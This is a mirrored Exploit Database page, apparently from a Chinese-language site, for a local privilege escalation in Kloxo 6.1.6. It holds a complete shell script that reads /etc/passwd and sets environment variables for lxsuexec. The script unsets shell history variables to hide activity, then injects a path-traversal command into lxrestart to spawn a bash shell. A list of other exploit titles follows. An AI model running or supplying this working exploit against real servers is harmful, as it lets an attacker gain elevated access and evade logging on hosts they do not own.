Kloxo 6.1.6 – Local Privilege Escalation

Exploit Database
51 阅读

作者： HTP

日期： 2013-05-13
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/25406/

#!/bin/sh
# Exploit Title: Kloxo Local Privilege Escalation
# Google Dork: inurl:kiddies
# Date: August 2012 or so
# Exploit Author: HTP
# Vendor Homepage: http://lxcenter.org/
# Software Link: [download link if available]
# Version: 6.1.6 (Latest)
# Tested on: CentOS 5
# CVE : None
# This exploit requires you to be the Apache user, or another capable of running lxsuexec.
LXLABS=`cat /etc/passwd | grep lxlabs | cut -d: -f3`
export MUID=$LXLABS
export GID=$LXLABS
export TARGET=/bin/sh
export CHECK_GID=0
export NON_RESIDENT=1
echo "unset HISTFILE HISTSAVE PROMPT_COMMAND TMOUT" >> /tmp/w00trc
echo "/usr/sbin/lxrestart '../../../bin/bash --init-file /tmp/w00trc #' " > /tmp/lol
lxsuexec /tmp/lol

last Exploits
Kloxo 6.1.6 – Local Privilege Escalation的更多信息

libiec61850 1.3 – Stack Based Buffer Overflow：
Zabbix Agent 3.0.1 – ‘mysql.size’ Shell Command Injection：
SOUND4 IMPACT/FIRST/PULSE/Eco v2.x – Unauthenticated Factory Reset：
Wondershare MobileTrans 3.5.9 – ‘ElevationService’ Unquoted Service Path：
rpi-update – Insecure Temporary File Handling / Security Bypass：
Mediacoder 0.7.5.4797 – ‘.m3u’ Local Buffer Overflow (SEH)：
FlexHEX 2.71 – SEH Buffer Overflow (Unicode)：
Ollydbg 2.00 Beta1 – Local Buffer Overflow：